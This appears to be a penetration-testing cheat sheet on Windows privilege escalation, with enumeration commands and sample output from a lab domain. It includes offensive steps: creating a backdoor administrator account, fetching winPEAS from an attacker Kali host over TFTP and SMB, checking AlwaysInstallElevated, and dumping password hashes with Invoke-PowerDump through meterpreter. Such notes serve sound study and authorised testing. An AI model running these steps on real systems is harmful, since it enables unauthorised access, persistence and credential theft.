In the windows environment, to escalate privilege various information about the target system is needed. Unfortunately Windows systems are not as easy as Linux specially in the case of terminal and obtaining information from the shell. Everything in Windows systems seems twisted and made intentionally complex. You will have to remember a lot of tools other commands just to grab the basic informations about the system.

Below I have listed down some of the commands which should help.

INFORMATION COLLECTION

running user

What is my account name

C:\Users>whoami
svcorp\alice

In which groups am I in ?

C:\Users\Public>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

system information

C:\Users>systeminfo

Host Name:                 SVCLIENT08
OS Name:                   Microsoft Windows 10 Pro N
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00331-60000-00000-AA584
Original Install Date:     04/03/2019, 13:27:02
System Boot Time:          25/11/2020, 14:29:01
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
<SNIP>

opeating system edition

type C:\Windows\system32\eula.txt

NET COMMAND

create user

To add a user into the system

net user saitama P@ssw0rd196 /ADD
net localgroup administrators saitama /add

to view all the users

net users

view domain groups

C:\Windows>net group /domain

The request will be processed at a domain controller for domain svcorp.com.

Group Accounts for \\sv-dc01.svcorp.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Company_Mail
...

view services

It is also possible to view all the running services using net command, the details of this has been shown in services section.

net start 

TRANSFER FILE

tftp

Start TFTP service in the kali machine by running the command

$ sudo service atftpd start

When the service is up and running, you can now pull / get the file from TFTP server by using following command.

C:\>tftp -i 192.168.119.178 GET winPEASx86.exe winPEASx86.exe

Here, please note that the files are located in the /srv/tftpd location.

smb

It is possible to mount the smb shares in the kali machine and mount that share into the victim box.

net use m: \\192.168.119.178\folder1 /user:kali kali

When work is done use the following command to remove it.

net use m: /delete

ALWAYS INSTLL ELIVATED

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

SERVICE

Enum information of all the services

By using this you can view detailed information of all the services running on the remote system. The command works at XP SP1.

C:\>sc queryex type= service
sc queryex type= service

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS 
        STATE              : 4  RUNNING 
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 964
        FLAGS              : 
<SNIP>

All the running services can also be obtained by using tasklist.

C:\>tasklist /SVC 

Image Name                   PID Services                                     
========================= ====== =============================================
System Idle Process            0 N/A                                          
System                         4 N/A                                          
smss.exe                     360 N/A                                          
csrss.exe                    408 N/A                                          
winlogon.exe                 432 N/A                                          
services.exe                 476 Eventlog, PlugPlay                           
lsass.exe                    488 SamSs                                        
svchost.exe                  664 RpcSs                                        
svchost.exe                  712 AudioSrv, Browser, CryptSvc, dmserver,       
                                 EventSystem, lanmanserver,                   
                                 lanmanworkstation, Messenger, Netman, Nla,   
                                 RasMan, Schedule, seclogon, SENS,            
                                 SharedAccess, ShellHWDetection, TapiSrv,     
                                 TermService, Themes, TrkWks, uploadmgr,      
                                 winmgmt                                      
svchost.exe                  760 Dnscache                                     
svchost.exe                  772 LmHosts, RemoteRegistry, WebClient           
alg.exe                      964 ALG                                          
snmp.exe                    1028 SNMP                                         
VGAuthService.exe           1052 VGAuthService                                

To view the running processes in the system.

C:\>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0                         0         20 K
System                         4                         0        216 K
smss.exe                     360                         0        344 K
csrss.exe                    408                         0      1,864 K
winlogon.exe                 432                         0     40,668 K
services.exe                 476                         0     10,024 K
lsass.exe                    488                         0      4,520 K
svchost.exe                  664                         0      3,064 K
svchost.exe                  712                         0     22,688 K
C:\> net start 

These Windows services are started:

   Application Layer Gateway Service
   COM+ Event System
   COM+ System Application
   Computer Browser
   Cryptographic Services
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Event Log
   FTP Publishing
   IIS Admin
   Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
   Logical Disk Manager
   Messenger
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Remote Access Connection Manager

To query all the drives running in the system.

C:\>DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date             
============ ====================== ============= ======================
ACPI         Microsoft ACPI Driver  Kernel        8/29/2002 9:09:03 AM  
ACPIEC       ACPIEC                 Kernel        8/17/2001 9:57:55 PM  
AFD          AFD Networking Support Kernel        8/17/2011 2:49:53 PM  
agp440       Intel AGP Bus Filter   Kernel        8/17/2001 9:57:59 PM  
AsyncMac     RAS Asynchronous Media Kernel        8/17/2001 9:55:29 PM  
atapi        Standard IDE/ESDI Hard Kernel        8/29/2002 9:27:48 AM  
Atmarpc      ATM ARP Client Protoco Kernel        8/17/2001 9:46:40 PM  
audstub      Audio Stub Driver      Kernel        8/17/2001 9:59:40 PM  
Beep         Beep                   Kernel        8/17/2001 9:47:33 PM  
cbidf2k      cbidf2k                Kernel        8/17/2001 9:52:06 PM  
Cdaudio      Cdaudio                Kernel        8/17/2001 9:52:26 PM  
Cdfs         Cdfs                   File System   8/29/2002 9:58:50 AM  
Cdrom        CD-ROM Driver          Kernel        8/29/2002 9:27:55 AM  
CmBatt       Microsoft AC Adapter D Kernel        8/29/2002 9:09:04 AM  
Compbatt     Microsoft Composite Ba Kernel        8/17/2001 9:57:58 PM  
Disk         Disk Driver            Kernel        8/29/2002 9:27:56 AM  

This command might not work if the user does not have sufficient permission to run wmic.

wmic product get name, version,  vendor

using PowerShell

Get-Service

service details

To obtain detailed information of a specific service:

C:\>sc query uploadmgr 
sc query uploadmgr

SERVICE_NAME: uploadmgr
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 4  RUNNING 
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Detailed information:

C:\>sc qc uploadmgr
sc qc uploadmgr
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: uploadmgr
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k netsvcs  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Upload Manager  
        DEPENDENCIES       : RPCSS  
        SERVICE_START_NAME : LocalSystem  

Here, the binary path should show the exact location from where this application is running from, but in this case it is not.

script to check for permissions

First you need to go to a location where you have write permission and run this command. It will list down all the commands

We are interested in services where permissions are: BUILTIN\Users with (F) or (C) or (M) for our group. More info about permissions:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt

Then run the following command which will use icalcs to view the permissions in the services.

for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"

PowerShell

msf PowerDump.ps1

Use following command to impor the PowerDump script and execute it.

meterpreter > powershell_import /home/kali/Desktop/wintools/Invoke-PowerDump.ps1

meterpreter > powershell_execute Invoke-PowerDump

SCHEDULED TASKS

all service - verbose

The following command dumps all the running services in the running system. Data found from this command can overwhelming.

schtasks /query /fo LIST /v
schtasks /query /fo LIST

DRIVERS

Installed Drivers

To do this first you need to go to powershell as it utilizes some of the select from it.

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

View Driver Version

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DevicenName -like "*udfs*"}

PS - View Driver Version

Get-WmiObject Win32_PnPSignedDriver| select DeviceName, DriverVersion, Manufacturer

AUTO ELEIVATE

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

reference

  1. Following exploits hands on (Services with Vulnerable Privileges etc.. need to study (link)
  2. some good list of how to escalate priv in windows (link)
  3. how grab file from attacker ws (link)
  4. accesschk.exe for windows xp (link)
  5. a very good list of what to do post (link)
  6. good guide (link)
  7. windows exploits and versions, mostly for HTB but should work too (link)
  8. already compiled exploits ready to download and run(link)
  9. looking for this one ? (link)
  10. priv esc using unquoted service (link)

unsorted references

https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/ http://www.fuzzysecurity.com/tutorials/16.html https://sushant747.gitbooks.io/total-oscp-guide/content/cmd.html https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://blog.adithyanak.com/oscp-preparation-guide https://thor-sec.com/review/oscp/oscp_review/ https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md

http://0xc0ffee.io/blog/OSCP-Goldmine https://guif.re/windowseop